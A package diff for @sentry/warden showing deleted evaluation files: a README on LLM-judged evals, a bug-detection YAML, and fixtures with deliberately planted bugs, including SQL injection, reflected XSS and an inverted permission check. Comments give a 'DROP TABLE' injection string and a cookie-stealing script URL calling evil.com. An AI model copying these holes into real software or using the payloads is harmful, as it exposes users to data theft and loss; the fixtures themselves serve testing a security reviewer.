@sentry/warden 0.12.0 → 0.14.0

Files changed (145)
  1. package/agents.lock +66 -0
  2. package/dist/cli/args.d.ts +17 -9
  3. package/dist/cli/args.d.ts.map +1 -1
  4. package/dist/cli/args.js +51 -2
  5. package/dist/cli/args.js.map +1 -1
  6. package/dist/cli/commands/add.js +1 -1
  7. package/dist/cli/commands/add.js.map +1 -1
  8. package/dist/cli/commands/init.d.ts +0 -3
  9. package/dist/cli/commands/init.d.ts.map +1 -1
  10. package/dist/cli/commands/init.js +219 -24
  11. package/dist/cli/commands/init.js.map +1 -1
  12. package/dist/cli/commands/logs.d.ts +19 -0
  13. package/dist/cli/commands/logs.d.ts.map +1 -0
  14. package/dist/cli/commands/logs.js +419 -0
  15. package/dist/cli/commands/logs.js.map +1 -0
  16. package/dist/cli/commands/sync.d.ts.map +1 -1
  17. package/dist/cli/commands/sync.js +16 -4
  18. package/dist/cli/commands/sync.js.map +1 -1
  19. package/dist/cli/fix.d.ts.map +1 -1
  20. package/dist/cli/fix.js +6 -1
  21. package/dist/cli/fix.js.map +1 -1
  22. package/dist/cli/log-cleanup.d.ts +6 -5
  23. package/dist/cli/log-cleanup.d.ts.map +1 -1
  24. package/dist/cli/log-cleanup.js +11 -10
  25. package/dist/cli/log-cleanup.js.map +1 -1
  26. package/dist/cli/main.d.ts.map +1 -1
  27. package/dist/cli/main.js +87 -29
  28. package/dist/cli/main.js.map +1 -1
  29. package/dist/cli/output/formatters.d.ts +8 -2
  30. package/dist/cli/output/formatters.d.ts.map +1 -1
  31. package/dist/cli/output/formatters.js +40 -19
  32. package/dist/cli/output/formatters.js.map +1 -1
  33. package/dist/cli/output/index.d.ts +2 -2
  34. package/dist/cli/output/index.d.ts.map +1 -1
  35. package/dist/cli/output/index.js +2 -2
  36. package/dist/cli/output/index.js.map +1 -1
  37. package/dist/cli/output/ink-runner.js +1 -1
  38. package/dist/cli/output/ink-runner.js.map +1 -1
  39. package/dist/cli/output/jsonl.d.ts +51 -14
  40. package/dist/cli/output/jsonl.d.ts.map +1 -1
  41. package/dist/cli/output/jsonl.js +140 -7
  42. package/dist/cli/output/jsonl.js.map +1 -1
  43. package/dist/cli/output/reporter.d.ts +4 -0
  44. package/dist/cli/output/reporter.d.ts.map +1 -1
  45. package/dist/cli/output/reporter.js +14 -0
  46. package/dist/cli/output/reporter.js.map +1 -1
  47. package/dist/cli/output/tasks.d.ts +3 -1
  48. package/dist/cli/output/tasks.d.ts.map +1 -1
  49. package/dist/cli/output/tasks.js +7 -4
  50. package/dist/cli/output/tasks.js.map +1 -1
  51. package/dist/cli/terminal.d.ts +4 -3
  52. package/dist/cli/terminal.d.ts.map +1 -1
  53. package/dist/cli/terminal.js +22 -11
  54. package/dist/cli/terminal.js.map +1 -1
  55. package/dist/config/loader.d.ts +3 -1
  56. package/dist/config/loader.d.ts.map +1 -1
  57. package/dist/config/loader.js +2 -0
  58. package/dist/config/loader.js.map +1 -1
  59. package/dist/config/schema.d.ts +84 -70
  60. package/dist/config/schema.d.ts.map +1 -1
  61. package/dist/config/schema.js +7 -1
  62. package/dist/config/schema.js.map +1 -1
  63. package/dist/evals/types.d.ts +9 -15
  64. package/dist/evals/types.d.ts.map +1 -1
  65. package/dist/index.d.ts +2 -2
  66. package/dist/index.d.ts.map +1 -1
  67. package/dist/index.js +2 -0
  68. package/dist/index.js.map +1 -1
  69. package/dist/output/dedup.d.ts +14 -10
  70. package/dist/output/dedup.d.ts.map +1 -1
  71. package/dist/output/dedup.js +39 -17
  72. package/dist/output/dedup.js.map +1 -1
  73. package/dist/output/github-checks.d.ts +5 -3
  74. package/dist/output/github-checks.d.ts.map +1 -1
  75. package/dist/output/github-checks.js +14 -16
  76. package/dist/output/github-checks.js.map +1 -1
  77. package/dist/output/issue-renderer.js +1 -1
  78. package/dist/output/issue-renderer.js.map +1 -1
  79. package/dist/output/renderer.d.ts.map +1 -1
  80. package/dist/output/renderer.js +11 -7
  81. package/dist/output/renderer.js.map +1 -1
  82. package/dist/output/types.d.ts +3 -1
  83. package/dist/output/types.d.ts.map +1 -1
  84. package/dist/sdk/analyze.d.ts.map +1 -1
  85. package/dist/sdk/analyze.js +12 -5
  86. package/dist/sdk/analyze.js.map +1 -1
  87. package/dist/sdk/auth.d.ts +16 -0
  88. package/dist/sdk/auth.d.ts.map +1 -0
  89. package/dist/sdk/auth.js +37 -0
  90. package/dist/sdk/auth.js.map +1 -0
  91. package/dist/sdk/errors.d.ts +5 -0
  92. package/dist/sdk/errors.d.ts.map +1 -1
  93. package/dist/sdk/errors.js +20 -0
  94. package/dist/sdk/errors.js.map +1 -1
  95. package/dist/sdk/prompt.d.ts.map +1 -1
  96. package/dist/sdk/prompt.js +3 -1
  97. package/dist/sdk/prompt.js.map +1 -1
  98. package/dist/sdk/runner.d.ts +2 -1
  99. package/dist/sdk/runner.d.ts.map +1 -1
  100. package/dist/sdk/runner.js +3 -1
  101. package/dist/sdk/runner.js.map +1 -1
  102. package/dist/skills/remote.d.ts +4 -0
  103. package/dist/skills/remote.d.ts.map +1 -1
  104. package/dist/skills/remote.js +47 -27
  105. package/dist/skills/remote.js.map +1 -1
  106. package/dist/types/index.d.ts +42 -22
  107. package/dist/types/index.d.ts.map +1 -1
  108. package/dist/types/index.js +45 -7
  109. package/dist/types/index.js.map +1 -1
  110. package/package.json +1 -1
  111. package/{plugins/warden/skills → skills}/warden/SKILL.md +2 -4
  112. package/{plugins/warden/skills → skills}/warden/references/cli-reference.md +7 -9
  113. package/{plugins/warden/skills → skills}/warden/references/config-schema.md +5 -7
  114. package/{plugins/warden/skills → skills}/warden/references/configuration.md +10 -8
  115. package/{plugins/warden/skills → skills}/warden/references/creating-skills.md +6 -6
  116. package/skills/warden-sweep/SKILL.md +407 -0
  117. package/skills/warden-sweep/scripts/_utils.py +37 -0
  118. package/skills/warden-sweep/scripts/extract_findings.py +219 -0
  119. package/skills/warden-sweep/scripts/find_reviewers.py +115 -0
  120. package/skills/warden-sweep/scripts/generate_report.py +271 -0
  121. package/skills/warden-sweep/scripts/index_prs.py +187 -0
  122. package/skills/warden-sweep/scripts/organize.py +315 -0
  123. package/skills/warden-sweep/scripts/scan.py +632 -0
  124. package/.claude-plugin/marketplace.json +0 -20
  125. package/.mcp.json +0 -8
  126. package/agents.toml +0 -7
  127. package/conductor.json +0 -8
  128. package/evals/README.md +0 -154
  129. package/evals/bug-detection.yaml +0 -56
  130. package/evals/fixtures/ignores-style-issues/utils.ts +0 -48
  131. package/evals/fixtures/missing-await/cache.ts +0 -45
  132. package/evals/fixtures/null-property-access/handler.ts +0 -36
  133. package/evals/fixtures/off-by-one/paginator.ts +0 -38
  134. package/evals/fixtures/sql-injection/api.ts +0 -59
  135. package/evals/fixtures/stale-closure/counter.tsx +0 -33
  136. package/evals/fixtures/wrong-comparison/validator.ts +0 -52
  137. package/evals/fixtures/xss-reflected/server.ts +0 -55
  138. package/evals/precision.yaml +0 -15
  139. package/evals/security-scanning.yaml +0 -24
  140. package/evals/skills/bug-detection.md +0 -33
  141. package/evals/skills/precision.md +0 -18
  142. package/evals/skills/security-scanning.md +0 -32
  143. package/plugins/.claude-plugin/marketplace.json +0 -14
  144. package/plugins/warden/.claude-plugin/plugin.json +0 -7
  145. package/scripts/update-pricing.ts +0 -88
package/evals/README.md DELETED
@@ -1,154 +0,0 @@
1
- # Warden Evals
2
-
3
- End-to-end behavioral evaluations for the Warden pipeline. These evals verify
4
- that Warden correctly runs skills, invokes the agent, extracts findings, and
5
- produces the expected behavioral outcomes on known code.
6
-
7
- ## Philosophy
8
-
9
- Evals are not unit tests or A/B comparisons. They answer one question:
10
-
11
- > **Does the Warden pipeline behave correctly when given known inputs?**
12
-
13
- Each eval provides code with a known issue, runs the full Warden agent pipeline
14
- (skill loading, prompt construction, SDK invocation, finding extraction), and
15
- uses an LLM judge to verify the output matches behavioral expectations.
16
-
17
- Evals test **Warden's behavior**, not individual skills. Skills are used as
18
- test vehicles to exercise the pipeline.
19
-
20
- The only thing mocked is the GitHub event payload. Everything else runs for
21
- real.
22
-
23
- ## YAML Format
24
-
25
- Evals are defined in YAML files at the top level of `evals/`. Each file
26
- describes a category of behaviors with a shared test skill and a list of
27
- scenarios. No custom code per eval. Adding a new eval means adding an entry
28
- to a YAML file and a fixture file.
29
-
30
- ```yaml
31
- skill: skills/bug-detection.md
32
-
33
- evals:
34
- - name: null-property-access
35
- given: code that accesses properties on an array .find() result without null checking
36
- files:
37
- - fixtures/null-property-access/handler.ts
38
- should_find:
39
- - finding: accessing .name on a potentially undefined user object from Array.find()
40
- severity: high
41
- should_not_find:
42
- - style, formatting, or naming issues
43
- - the lack of try/catch around the fetch call
44
- ```
45
-
46
- This reads as:
47
-
48
- > **Given** code that accesses properties on an array `.find()` result without
49
- > null checking, Warden **should find** a null access bug and **should not
50
- > find** style issues.
51
-
52
- ## Eval Structure
53
-
54
- ```
55
- evals/
56
- ├── README.md
57
- ├── bug-detection.yaml # Category: finding logic bugs
58
- ├── security-scanning.yaml # Category: finding security vulnerabilities
59
- ├── precision.yaml # Category: avoiding false positives
60
- ├── skills/ # Test skills (vehicles for exercising pipeline)
61
- │ ├── bug-detection.md
62
- │ ├── security-scanning.md
63
- │ └── precision.md
64
- └── fixtures/ # Source code with known issues
65
- ├── null-property-access/
66
- │ └── handler.ts
67
- ├── off-by-one/
68
- │ └── paginator.ts
69
- ├── missing-await/
70
- │ └── cache.ts
71
- ├── wrong-comparison/
72
- │ └── validator.ts
73
- ├── stale-closure/
74
- │ └── counter.tsx
75
- ├── sql-injection/
76
- │ └── api.ts
77
- ├── xss-reflected/
78
- │ └── server.ts
79
- └── ignores-style-issues/
80
- └── utils.ts
81
- ```
82
-
83
- ## YAML Schema
84
-
85
- ### File-level fields
86
-
87
- | Field | Required | Description |
88
- |-------|----------|-------------|
89
- | `skill` | Yes | Path to test skill, relative to `evals/` |
90
- | `model` | No | Default model for all evals (default: `claude-sonnet-4-6`) |
91
- | `evals` | Yes | List of eval scenarios (at least one) |
92
-
93
- ### Per-eval fields
94
-
95
- | Field | Required | Description |
96
- |-------|----------|-------------|
97
- | `name` | Yes | Scenario name (used in test output) |
98
- | `given` | Yes | What code/situation the eval sets up (BDD "given") |
99
- | `files` | Yes | Fixture files, relative to `evals/` |
100
- | `model` | No | Model override for this scenario |
101
- | `should_find` | Yes | What the pipeline should detect (at least one) |
102
- | `should_find[].finding` | Yes | Natural language description for the LLM judge |
103
- | `should_find[].severity` | No | Expected severity (hint, not strict) |
104
- | `should_find[].required` | No | If true (default), eval fails when not found |
105
- | `should_not_find` | No | Things the pipeline should NOT report (precision) |
106
-
107
- ## Running Evals
108
-
109
- ```bash
110
- # Run all evals (requires ANTHROPIC_API_KEY)
111
- pnpm test:evals
112
-
113
- # Run evals for a specific category
114
- pnpm test:evals -- --grep "bug-detection"
115
-
116
- # Run a single eval
117
- pnpm test:evals -- --grep "null-property-access"
118
- ```
119
-
120
- Evals make real API calls. They run skills on `claude-sonnet-4-6` by
121
- default.
122
-
123
- ## Adding a New Eval
124
-
125
- 1. Pick an existing YAML file or create a new `evals/<category>.yaml`
126
- 2. Add a scenario entry under the `evals:` key
127
- 3. Create a fixture file under `evals/fixtures/<scenario>/`
128
- 4. Run `pnpm test:evals` to verify
129
-
130
- If a new category needs a different test skill, add it to `evals/skills/`.
131
-
132
- ### Guidelines
133
-
134
- - **One bug per eval.** Each scenario tests one specific behavior.
135
- - **Make bugs realistic.** Code should look like something a human wrote.
136
- - **Write precise `should_find`.** "null access on user.name from Array.find()"
137
- is better than "finds a bug."
138
- - **Include `should_not_find`.** If the code has issues the skill should ignore,
139
- call them out.
140
- - **Keep fixtures small.** 20-80 lines. The agent analyzes hunks, not novels.
141
- - **No custom code.** Every eval is just YAML + fixture files.
142
-
143
- ## How It Works
144
-
145
- 1. **Discovery**: Scan `evals/` for `.yaml` files
146
- 2. **Loading**: Parse YAML, validate with Zod, resolve paths
147
- 3. **Git repo**: Create a temp repo with fixture files committed on an `eval`
148
- branch (empty `main` as base), so the agent has a real repo to explore
149
- 4. **Context**: Build `EventContext` from real `git diff main...eval`
150
- 5. **Execution**: Run the skill via `runSkill()` with the real SDK pipeline;
151
- the agent operates in the temp repo with Read/Grep tools
152
- 6. **Judgment**: An LLM judge (Sonnet) evaluates findings against assertions
153
- 7. **Verdict**: Pass if all required `should_find` are met and no
154
- `should_not_find` are violated
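Reviewer sketch of the verdict rule described in the removed README (step 7, together with the `required` default from the schema table). The `JudgeResult` shape and the `verdict` function name are assumptions made for illustration; the diff does not show how Warden actually represents judge output.

```typescript
// Hypothetical shapes; the real Warden eval types are not shown in this diff.
interface ShouldFind {
  finding: string;
  severity?: string;
  required?: boolean; // the README states this defaults to true
}

interface JudgeResult {
  // One entry per should_find assertion, in order: did the judge see it?
  found: boolean[];
  // One entry per should_not_find assertion: was it reported anyway?
  violated: boolean[];
}

// Pass only if every required should_find was met and no should_not_find was violated.
function verdict(shouldFind: ShouldFind[], result: JudgeResult): "pass" | "fail" {
  const missingRequired = shouldFind.some(
    (expectation, i) => (expectation.required ?? true) && !result.found[i]
  );
  const anyViolation = result.violated.some(Boolean);
  return missingRequired || anyViolation ? "fail" : "pass";
}
```

Under this reading, an entry with `required: false` (as in `precision.yaml`) can be missed without failing the eval, while a single `should_not_find` violation always fails it.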
package/evals/bug-detection.yaml DELETED
@@ -1,56 +0,0 @@
1
- skill: skills/bug-detection.md
2
-
3
- evals:
4
- - name: null-property-access
5
- given: code that accesses properties on an array .find() result without null checking
6
- files:
7
- - fixtures/null-property-access/handler.ts
8
- should_find:
9
- - finding: accessing .name and .profile.avatar on a potentially undefined user object from Array.find()
10
- severity: high
11
- should_not_find:
12
- - style, formatting, or naming issues
13
- - the lack of try/catch around the fetch call
14
-
15
- - name: off-by-one
16
- given: pagination logic that uses Math.floor instead of Math.ceil, skipping the last page
17
- files:
18
- - fixtures/off-by-one/paginator.ts
19
- should_find:
20
- - finding: off-by-one error in page count calculation that loses the last page when totalItems is not evenly divisible by pageSize
21
- severity: medium
22
- should_not_find:
23
- - use of any[] type
24
- - missing error handling
25
-
26
- - name: missing-await
27
- given: async cache lookup missing await, causing a Promise object to be used as a truthy value
28
- files:
29
- - fixtures/missing-await/cache.ts
30
- should_find:
31
- - finding: missing await on loadFromCache() call, so cached is always a truthy Promise and the function never actually fetches fresh data
32
- severity: high
33
- should_not_find:
34
- - console.log statements
35
- - missing return type annotations
36
-
37
- - name: wrong-comparison
38
- given: permission check using <= instead of >=, inverting the access control logic
39
- files:
40
- - fixtures/wrong-comparison/validator.ts
41
- should_find:
42
- - finding: comparison operator is <= instead of >=, granting access to lower-privilege users while denying higher-privilege users
43
- severity: high
44
- should_not_find:
45
- - hardcoded role strings
46
- - suggestion to use an enum for roles
47
-
48
- - name: stale-closure
49
- given: React useEffect with setInterval that captures count in a stale closure
50
- files:
51
- - fixtures/stale-closure/counter.tsx
52
- should_find:
53
- - finding: "stale closure: setInterval callback captures initial count value and never sees updates, so the counter always sets the same value"
54
- severity: high
55
- should_not_find:
56
- - TypeScript type annotation issues
package/evals/fixtures/ignores-style-issues/utils.ts DELETED
@@ -1,48 +0,0 @@
1
- // This code is functionally correct but has style issues.
2
- // A precision-focused eval: the skill should NOT report any of these as bugs.
3
-
4
- // Inconsistent naming convention (camelCase vs snake_case)
5
- export function calculate_total(items: number[]): number {
6
- let runningTotal = 0;
7
- for (let i = 0; i < items.length; i++) {
8
- runningTotal = runningTotal + items[i]!;
9
- }
10
- return runningTotal;
11
- }
12
-
13
- // Verbose conditional (could be simplified but is correct)
14
- export function isEligible(age: number, hasConsent: boolean): boolean {
15
- if (age >= 18) {
16
- if (hasConsent === true) {
17
- return true;
18
- } else {
19
- return false;
20
- }
21
- } else {
22
- return false;
23
- }
24
- }
25
-
26
- // Missing JSDoc, long parameter list, but functionally correct
27
- export function formatAddress(
28
- street: string,
29
- city: string,
30
- state: string,
31
- zip: string,
32
- country: string
33
- ): string {
34
- const parts = [street, city, state, zip, country];
35
- return parts.filter((p) => p.length > 0).join(', ');
36
- }
37
-
38
- // Magic numbers but correct behavior
39
- export function calculateDiscount(price: number, quantity: number): number {
40
- if (quantity >= 100) {
41
- return price * 0.8;
42
- } else if (quantity >= 50) {
43
- return price * 0.9;
44
- } else if (quantity >= 10) {
45
- return price * 0.95;
46
- }
47
- return price;
48
- }
package/evals/fixtures/missing-await/cache.ts DELETED
@@ -1,45 +0,0 @@
1
- interface CacheEntry {
2
- key: string;
3
- value: string;
4
- expiresAt: number;
5
- }
6
-
7
- const store = new Map<string, CacheEntry>();
8
-
9
- async function saveToCache(key: string, value: string, ttlMs: number): Promise<void> {
10
- // Simulate async storage (e.g., Redis, database)
11
- await new Promise((resolve) => setTimeout(resolve, 1));
12
- store.set(key, {
13
- key,
14
- value,
15
- expiresAt: Date.now() + ttlMs,
16
- });
17
- }
18
-
19
- async function loadFromCache(key: string): Promise<string | null> {
20
- await new Promise((resolve) => setTimeout(resolve, 1));
21
- const entry = store.get(key);
22
- if (!entry) return null;
23
- if (Date.now() > entry.expiresAt) {
24
- store.delete(key);
25
- return null;
26
- }
27
- return entry.value;
28
- }
29
-
30
- export async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
31
- // Bug: missing await on loadFromCache. The result `cached` will be a
32
- // Promise, which is truthy, so the function always returns a Promise
33
- // object (as a string) instead of the actual cached value.
34
- const cached = loadFromCache(key);
35
-
36
- if (cached) {
37
- console.log('Cache hit:', key);
38
- return cached as unknown as string;
39
- }
40
-
41
- console.log('Cache miss:', key);
42
- const fresh = await fetchFn();
43
- await saveToCache(key, fresh, 60_000);
44
- return fresh;
45
- }
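Reviewer sketch of why the missing `await` in this fixture matters: a Promise is always truthy, so the cache-hit branch is taken even when nothing is cached. The in-memory `store` contents and the two helper names are illustrative assumptions, not part of the fixture.

```typescript
// Illustrative stand-in for the fixture's async cache lookup.
const store = new Map<string, string>([["known", "value"]]);

async function loadFromCache(key: string): Promise<string | null> {
  return store.get(key) ?? null;
}

// Without await, `cached` is a Promise object, which is truthy for every key.
function looksLikeHitWithoutAwait(key: string): boolean {
  const cached = loadFromCache(key);
  return Boolean(cached);
}

// With await, the resolved value is inspected, so a miss is reported as a miss.
async function isHit(key: string): Promise<boolean> {
  const cached = await loadFromCache(key);
  return cached !== null;
}
```

This matches the expectation in `bug-detection.yaml` that `cached` is always a truthy Promise and fresh data is never fetched.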
package/evals/fixtures/null-property-access/handler.ts DELETED
@@ -1,36 +0,0 @@
1
- interface User {
2
- id: string;
3
- name: string;
4
- email: string;
5
- profile: {
6
- avatar: string;
7
- bio: string;
8
- };
9
- }
10
-
11
- interface ApiResponse {
12
- users: User[];
13
- total: number;
14
- }
15
-
16
- async function fetchUsers(endpoint: string): Promise<ApiResponse> {
17
- const response = await fetch(endpoint);
18
- return response.json() as Promise<ApiResponse>;
19
- }
20
-
21
- export async function getUserDisplayName(userId: string): Promise<string> {
22
- const data = await fetchUsers(`/api/users?id=${userId}`);
23
- const user = data.users.find((u) => u.id === userId);
24
-
25
- // Bug: user could be undefined if not found in the array,
26
- // but we access .name without checking
27
- const displayName = user.name;
28
- const avatarUrl = user.profile.avatar;
29
-
30
- return `${displayName} (${avatarUrl})`;
31
- }
32
-
33
- export async function getTeamMembers(teamId: string): Promise<string[]> {
34
- const data = await fetchUsers(`/api/teams/${teamId}/members`);
35
- return data.users.map((u) => u.name);
36
- }
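Reviewer sketch of one way the lookup in this fixture could be guarded. The `displayNameFor` helper and its `null` return for a missing user are assumptions chosen for illustration; the fixture itself is intentionally left unguarded.

```typescript
interface User {
  id: string;
  name: string;
  profile: { avatar: string };
}

// Array.prototype.find returns undefined when no element matches,
// so the result is checked before any property access.
function displayNameFor(users: User[], userId: string): string | null {
  const user = users.find((u) => u.id === userId);
  if (!user) return null;
  return `${user.name} (${user.profile.avatar})`;
}
```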
package/evals/fixtures/off-by-one/paginator.ts DELETED
@@ -1,38 +0,0 @@
1
- export interface PaginatedResult<T> {
2
- items: T[];
3
- page: number;
4
- totalItems: number;
5
- pageSize: number;
6
- }
7
-
8
- /**
9
- * Fetch all pages of results from a paginated API endpoint.
10
- * Collects items from every page and returns them as a flat array.
11
- */
12
- export async function fetchAllPages<T>(
13
- fetchPage: (page: number) => Promise<PaginatedResult<T>>
14
- ): Promise<T[]> {
15
- const firstPage = await fetchPage(1);
16
- const allItems: T[] = [...firstPage.items];
17
-
18
- // Bug: Math.floor loses the last page when totalItems is not evenly
19
- // divisible by pageSize. E.g., 25 items / 10 per page = 2.5, floored
20
- // to 2, so page 3 (items 21-25) is never fetched.
21
- const totalPages = Math.floor(firstPage.totalItems / firstPage.pageSize);
22
-
23
- for (let page = 2; page <= totalPages; page++) {
24
- const result = await fetchPage(page);
25
- allItems.push(...result.items);
26
- }
27
-
28
- return allItems;
29
- }
30
-
31
- /**
32
- * Get a specific page range of results.
33
- */
34
- export function getPageRange(totalItems: number, pageSize: number, currentPage: number): { start: number; end: number } {
35
- const start = (currentPage - 1) * pageSize;
36
- const end = Math.min(start + pageSize, totalItems);
37
- return { start, end };
38
- }
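Reviewer sketch of the page-count arithmetic behind this fixture's bug, using the 25-items, 10-per-page example from its comment. The `pageCount` helper and its guard on `pageSize` are assumptions added for illustration.

```typescript
// Rounds up so a final partial page is still counted.
function pageCount(totalItems: number, pageSize: number): number {
  if (pageSize <= 0) throw new RangeError("pageSize must be positive");
  return Math.ceil(totalItems / pageSize);
}

// The fixture's variant: rounds down and drops a final partial page.
function pageCountFloored(totalItems: number, pageSize: number): number {
  return Math.floor(totalItems / pageSize);
}
```

For 25 items at 10 per page, `pageCount` gives 3 and `pageCountFloored` gives 2, so the loop in the fixture never requests page 3.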
package/evals/fixtures/sql-injection/api.ts DELETED
@@ -1,59 +0,0 @@
1
- interface DbConnection {
2
- query(sql: string): Promise<Record<string, unknown>[]>;
3
- }
4
-
5
- function getConnection(): DbConnection {
6
- // In production this returns a real DB connection
7
- return {
8
- query: async (sql: string) => {
9
- console.log('Executing:', sql);
10
- return [];
11
- },
12
- };
13
- }
14
-
15
- interface SearchParams {
16
- name?: string;
17
- email?: string;
18
- role?: string;
19
- }
20
-
21
- /**
22
- * Search for users matching the given criteria.
23
- * Builds a dynamic WHERE clause from the search parameters.
24
- */
25
- export async function searchUsers(params: SearchParams): Promise<Record<string, unknown>[]> {
26
- const db = getConnection();
27
- const conditions: string[] = [];
28
-
29
- if (params.name) {
30
- // Bug: Direct string interpolation of user input into SQL query.
31
- // An attacker can pass name = "'; DROP TABLE users; --" to execute
32
- // arbitrary SQL.
33
- conditions.push(`name = '${params.name}'`);
34
- }
35
- if (params.email) {
36
- conditions.push(`email = '${params.email}'`);
37
- }
38
- if (params.role) {
39
- conditions.push(`role = '${params.role}'`);
40
- }
41
-
42
- const whereClause = conditions.length > 0
43
- ? `WHERE ${conditions.join(' AND ')}`
44
- : '';
45
-
46
- const sql = `SELECT id, name, email, role FROM users ${whereClause}`;
47
- return db.query(sql);
48
- }
49
-
50
- /**
51
- * Get a user by their ID (this one is safe - uses parameterized approach).
52
- */
53
- export async function getUserById(id: number): Promise<Record<string, unknown> | null> {
54
- const db = getConnection();
55
- // This is safe because we validate the type
56
- if (!Number.isInteger(id) || id <= 0) return null;
57
- const results = await db.query(`SELECT * FROM users WHERE id = ${id}`);
58
- return results[0] ?? null;
59
- }
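Reviewer sketch of a parameterized alternative to the string interpolation in this fixture. The `ParameterizedQuery` shape and the `$1`-style placeholders are assumptions (PostgreSQL-style numbering); the fixture's `DbConnection.query` accepts only a SQL string, so a real fix would also need a driver call that takes bound values.

```typescript
interface SearchParams {
  name?: string;
  email?: string;
  role?: string;
}

// Hypothetical shape: SQL text with numbered placeholders plus the bound values.
interface ParameterizedQuery {
  text: string;
  values: string[];
}

function buildSearchQuery(params: SearchParams): ParameterizedQuery {
  const conditions: string[] = [];
  const values: string[] = [];
  // Column names come from this fixed list, never from user input.
  const columns = ["name", "email", "role"] as const;
  for (const column of columns) {
    const value = params[column];
    if (value) {
      values.push(value);
      conditions.push(`${column} = $${values.length}`);
    }
  }
  const whereClause = conditions.length > 0 ? ` WHERE ${conditions.join(" AND ")}` : "";
  return { text: `SELECT id, name, email, role FROM users${whereClause}`, values };
}
```

User input only ever lands in `values`, so a payload such as the one in the fixture comment stays data and never becomes part of the SQL text.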
package/evals/fixtures/stale-closure/counter.tsx DELETED
@@ -1,33 +0,0 @@
1
- import { useState, useEffect } from 'react';
2
-
3
- interface CounterProps {
4
- initialValue: number;
5
- step: number;
6
- intervalMs: number;
7
- }
8
-
9
- /**
10
- * An auto-incrementing counter that ticks at a given interval.
11
- */
12
- export function AutoCounter({ initialValue, step, intervalMs }: CounterProps) {
13
- const [count, setCount] = useState(initialValue);
14
-
15
- useEffect(() => {
16
- // Bug: This closure captures `count` once at mount time.
17
- // Every tick reads the same stale `count` value and sets
18
- // count to initialValue + step, over and over. The counter
19
- // never actually increments past the first tick.
20
- const id = setInterval(() => {
21
- setCount(count + step);
22
- }, intervalMs);
23
-
24
- return () => clearInterval(id);
25
- // eslint-disable-next-line react-hooks/exhaustive-deps
26
- }, []);
27
-
28
- return (
29
- <div>
30
- <span data-testid="count">{count}</span>
31
- </div>
32
- );
33
- }
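Reviewer sketch of the stale-closure effect in this fixture, modeled without React so it can run standalone. `createCounterState` is a hypothetical stand-in for a state cell whose setter accepts either a value or an updater function, loosely mirroring the two calling styles of a React state setter; it is an analogy, not React's implementation.

```typescript
type Update = number | ((previous: number) => number);

// Minimal state cell: the setter accepts a value or a function of the previous value.
function createCounterState(initial: number) {
  let value = initial;
  return {
    get: (): number => value,
    set: (update: Update): void => {
      value = typeof update === "function" ? update(value) : update;
    },
  };
}

// Mirrors the fixture: the value is read once and reused on every tick.
function runStaleTicks(initial: number, step: number, ticks: number): number {
  const state = createCounterState(initial);
  const captured = state.get();
  for (let i = 0; i < ticks; i++) state.set(captured + step);
  return state.get();
}

// Updater form: each tick derives the next value from the current one.
function runFunctionalTicks(initial: number, step: number, ticks: number): number {
  const state = createCounterState(initial);
  for (let i = 0; i < ticks; i++) state.set((previous) => previous + step);
  return state.get();
}
```

After three ticks from 0 with step 1, the stale variant ends at 1 while the updater variant ends at 3, which is the behavior the fixture comment describes.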
package/evals/fixtures/wrong-comparison/validator.ts DELETED
@@ -1,52 +0,0 @@
1
- interface Permission {
2
- resource: string;
3
- action: 'read' | 'write' | 'delete';
4
- role: string;
5
- }
6
-
7
- const ROLE_HIERARCHY: Record<string, number> = {
8
- viewer: 0,
9
- editor: 1,
10
- admin: 2,
11
- superadmin: 3,
12
- };
13
-
14
- /**
15
- * Check if a user's role has sufficient permissions for an action.
16
- * Returns true if the user is allowed to perform the action.
17
- */
18
- export function hasPermission(userRole: string, requiredRole: string): boolean {
19
- const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
20
- const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
21
-
22
- // Bug: should be >= but uses <=, so only users with LOWER privilege
23
- // than required are granted access (e.g., a viewer can perform admin
24
- // actions, but an admin cannot).
25
- return userLevel <= requiredLevel;
26
- }
27
-
28
- /**
29
- * Filter a list of permissions to only those a user can perform.
30
- */
31
- export function filterAllowedActions(
32
- userRole: string,
33
- permissions: Permission[]
34
- ): Permission[] {
35
- return permissions.filter((p) => hasPermission(userRole, p.role));
36
- }
37
-
38
- /**
39
- * Validate that a user can perform a specific action on a resource.
40
- */
41
- export function validateAccess(
42
- userRole: string,
43
- resource: string,
44
- action: string,
45
- permissions: Permission[]
46
- ): boolean {
47
- const matching = permissions.find(
48
- (p) => p.resource === resource && p.action === action
49
- );
50
- if (!matching) return false;
51
- return hasPermission(userRole, matching.role);
52
- }
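Reviewer sketch of the comparison this fixture inverts, with the operator the fixture comment says was intended (`>=`). The name `hasPermissionFixed` is hypothetical; the role table and the `?? 0` fallback for unknown roles are copied from the fixture.

```typescript
const ROLE_HIERARCHY: Record<string, number> = {
  viewer: 0,
  editor: 1,
  admin: 2,
  superadmin: 3,
};

// Access is granted when the user's level is at least the required level.
function hasPermissionFixed(userRole: string, requiredRole: string): boolean {
  const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
  const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
  return userLevel >= requiredLevel;
}
```

Because unknown roles fall back to level 0, an unrecognized `requiredRole` is satisfied by every user; that fallback is inherited from the fixture and is not something the eval asks Warden to flag.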
package/evals/fixtures/xss-reflected/server.ts DELETED
@@ -1,55 +0,0 @@
1
- /**
2
- * Simple HTTP request handler for a search page.
3
- * Renders search results with the query term displayed back to the user.
4
- */
5
- export function handleSearchRequest(url: string): string {
6
- const parsed = new URL(url, 'http://localhost:3000');
7
- const query = parsed.searchParams.get('q') ?? '';
8
- const page = parseInt(parsed.searchParams.get('page') ?? '1', 10);
9
-
10
- // Simulate search results
11
- const results = performSearch(query, page);
12
-
13
- // Bug: The query string from the URL is interpolated directly into HTML
14
- // without escaping. An attacker can craft a URL like:
15
- // /search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>
16
- // and the script will execute in the victim's browser.
17
- return `
18
- <!DOCTYPE html>
19
- <html>
20
- <head><title>Search Results</title></head>
21
- <body>
22
- <h1>Search Results</h1>
23
- <p>Showing results for: <strong>${query}</strong></p>
24
- <p>Page ${page} of ${results.totalPages}</p>
25
- <ul>
26
- ${results.items.map((item) => `<li>${escapeHtml(item.title)}</li>`).join('\n')}
27
- </ul>
28
- </body>
29
- </html>
30
- `;
31
- }
32
-
33
- function escapeHtml(text: string): string {
34
- return text
35
- .replace(/&/g, '&amp;')
36
- .replace(/</g, '&lt;')
37
- .replace(/>/g, '&gt;')
38
